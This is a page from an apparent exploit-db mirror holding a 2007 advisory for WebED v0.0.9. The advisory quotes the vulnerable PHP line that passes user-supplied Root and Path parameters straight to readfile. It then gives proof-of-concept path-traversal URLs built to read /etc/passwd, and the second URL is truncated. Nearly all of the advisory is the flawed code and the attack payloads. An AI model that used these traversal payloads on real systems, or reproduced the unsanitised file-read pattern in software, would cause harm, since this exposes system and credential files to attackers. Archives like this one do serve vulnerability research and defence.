bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4677.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
434 B
Text
Raw Blame History

WebED v0.0.9 (index.php) Remote File Disclosure Vulnerabilities
Script : http://heanet.dl.sourceforge.net/sourceforge/ed-engine/WebED_v0.0.9.tar.gz
Vuln Code In /mod/chat/index.php :
<body>
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">
PoC :
/mod/chat/index.php?Root=../../../../../../etc/passwd
/mod/chat/index.php?Path=../../../../../../etc/pa
# milw0rm.com [2007-11-29]
Reference in a new issue View git blame Copy permalink